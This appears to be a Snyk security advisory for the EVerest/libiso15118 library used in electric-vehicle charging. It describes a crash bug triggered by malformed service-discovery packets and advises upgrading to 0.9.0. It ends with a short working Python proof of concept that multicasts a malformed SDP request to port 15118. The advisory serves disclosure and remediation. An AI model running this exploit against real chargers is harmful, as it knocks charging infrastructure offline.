Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade EVerest/libiso15118 to version 0.9.0 or higher.
Affected versions of this package are vulnerable to Uncaught Exception due to improper handling of read_single_sdp_packet in the TbdController loop. An attacker can cause critical server processes to terminate by sending a malformed packet.
Note: while the CVE was issued for everest-core, the affected library is in libiso15118
import socket
from iso15118.shared.messages.sdp import SDPRequest, Security, Transport
from iso15118.shared.messages.v2gtp import V2GTPMessage
from iso15118.shared.messages.enums import Protocol
MULTICAST_GROUP = 'FF02::1'
PORT = 15118
INTERFACE = 'enp1s0'
def send_sdp_request():
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, socket.if_nametoindex(INTERFACE))
security = Security.NO_TLS
sdp_request = SDPRequest(security=security, transport_protocol=Transport.TCP)
v2gtp_msg = V2GTPMessage(
Protocol.UNKNOWN, sdp_request.payload_type, sdp_request.to_payload()
)
sock.sendto(v2gtp_msg.to_bytes(), (MULTICAST_GROUP, PORT))
send_sdp_request()